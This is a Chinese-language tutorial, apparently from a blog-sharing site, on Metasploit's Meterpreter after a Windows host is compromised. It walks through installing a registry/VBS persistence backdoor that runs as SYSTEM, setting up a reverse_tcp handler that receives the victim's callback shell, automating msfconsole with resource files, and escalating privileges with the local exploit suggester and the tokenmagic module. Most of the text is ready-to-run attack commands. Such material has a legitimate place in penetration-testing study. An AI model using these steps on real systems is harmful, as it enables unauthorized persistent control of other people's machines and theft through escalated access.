Metapreter实现持续访问,自动化,提权--详细教程

Metapreter 实现持续访问

1.先拿到目标主机的控制权限后,将目标主机的会话转入后台,切换到 exploit/windows/local/persistence 模块,注意这个模块选择的payload,因为在后面进行监听的时候需要和这个payload相同

Metapreter实现持续访问,自动化,提权--详细教程_第1张图片
2.通过options查看需要填写的参数

EXE_NAME 生成后门文件的文件名称(非必要,用默认)
PATH 后门文件的存放路径 (非必要,用默认)
REG_NAME 注册表设置的名称 (非必要,用默认)
SESSION 作用于那个会话
STARTUP 由那个用户来运行这个脚本(一般都写SYSTEM,注:这里必须大写)
VBS_NAME VBS脚本的名称 (非必要,用默认)
Metapreter实现持续访问,自动化,提权--详细教程_第2张图片
set SESSION 8
setg lhost 173.30.1.3

Metapreter实现持续访问,自动化,提权--详细教程_第3张图片
3.执行
exploit
Metapreter实现持续访问,自动化,提权--详细教程_第4张图片
Metapreter实现持续访问,自动化,提权--详细教程_第5张图片
Metapreter实现持续访问,自动化,提权--详细教程_第6张图片
4. 打开kali监听模块 exploit/multi/handler
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 172.30.1.3
set lport 7723
exploit -j -z

-j 加入任务
-z 后台运行
Metapreter实现持续访问,自动化,提权--详细教程_第7张图片

Metapreter自动化

msfconsole -q -r <文件名> 启动时读取文件命令执行实现自动化

cat msfstart.txt
Metapreter实现持续访问,自动化,提权--详细教程_第8张图片

msfconsole -q -r msfstart.txt
这里会自动执行文件中的命令

Metapreter实现持续访问,自动化,提权--详细教程_第9张图片

Metapreter提权

local exploit suggester 模块(本地漏洞利用),用来做提权
search suggester
Metapreter实现持续访问,自动化,提权--详细教程_第10张图片
use 0
options
Metapreter实现持续访问,自动化,提权--详细教程_第11张图片
set session 1
exploit
Metapreter实现持续访问,自动化,提权--详细教程_第12张图片

可以尝试前面绿色的
Metapreter实现持续访问,自动化,提权--详细教程_第13张图片
use exploit exploit/windows/local/tokenmagic
options

Metapreter实现持续访问,自动化,提权--详细教程_第14张图片
set session 1
set LHOST 172.30.1.3
exploit
getuid

提权成功
Metapreter实现持续访问,自动化,提权--详细教程_第15张图片

你可能感兴趣的:(自动化,运维)